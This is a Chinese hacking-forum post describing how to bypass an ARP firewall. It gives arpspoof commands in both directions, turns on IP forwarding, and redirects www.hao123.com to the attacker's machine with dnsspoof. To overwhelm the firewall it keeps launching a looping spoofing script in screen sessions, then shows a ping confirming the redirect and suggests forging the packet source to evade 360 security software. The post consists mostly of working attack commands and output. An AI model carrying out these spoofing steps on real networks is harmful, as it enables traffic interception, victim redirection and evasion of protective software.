SPOOF简单突破ARP防火墙
weibo
Dis9Team
之前看过相关的文档,晚上菊花隐隐作疼,天子安全团队成员也都没什么消息了,和法客的合作文章也很久没有写了,趁今天菊花蛋疼之际弄点文章出来吧。
看之前参考:http://sb.f4ck.net/forum.php?mod ... mp;page=1#pid146174
先测试下DNS欺骗能否成功吧:
- ~# netstat -r
- Kernel IP routing table
- Destination Gateway Genmask Flags MSS Window irtt Iface
- 5.5.5.0 * 255.255.255.0 U 0 0 0 eth0
- link-local * 255.255.0.0 U 0 0 0 eth0
- default 1.1.1.2 0.0.0.0 UG 0 0 0 eth0
- ~# arpspoof 1.1.1.2 -t 1.1.1.5 /终端1
- ~# arpspoof 1.1.1.5 -t 1.1.1.2 /终端2
- ~# echo 1 > /proc/sys/net/ipv4/ip_forward /转发
- 打开arp防火墙后发现有动静即算成功
复制代码
欺骗下dns 不停的发包吧~~~- ~# cat baidu
- 1.1.1.4 www.hao123.com /1.1.1.4本机的
- ~# dnsspoof -f baidu host 1.1.1.1.5 and udp port 53
- ~#cat send /继续不停的发包~~~
- arpspoof 1.1.1.5 -t 1.1.1.2
- arpspoof 1.1.1.2 -t 1.1.1.5
- ~# screen ./send
- [1]+ Stopped screen ./send
- ~#screen ./send
- [2]+ Stopped screen ./send /多做几次就可以射了
- ~~~~~~~~~~~~~~~~
- ~~~~~~~~~~~~~~~~~~
- ~#screen -ls /看下进程
- There are screens on:
- 3754.pts-7.TzSec Team (11/01/2012 12:21:47 AM) (Detached)
- 3750.pts-7.TzSec Team (11/01/2012 12:21:46 AM) (Detached)
- 3746.pts-7.TzSec Team (11/01/2012 12:21:44 AM) (Detached)
- 3742.pts-7.TzSec Team (11/01/2012 12:21:41 AM) (Detached)
- 3722.pts-4.TzSec Team (11/01/2012 12:21:21 AM) (Attached)
- 6 Sockets in /var/run/screen/S-root.
- ~#
- 下面就是转到win下
- ping www.hao123.com
- Pinging www.hao123.com [1.1.1.4] with 32 bytes of data:
- Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
- Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
复制代码
对于360应该伪装下发包源就可以了
关注公众号:拾黑(shiheibook)了解更多!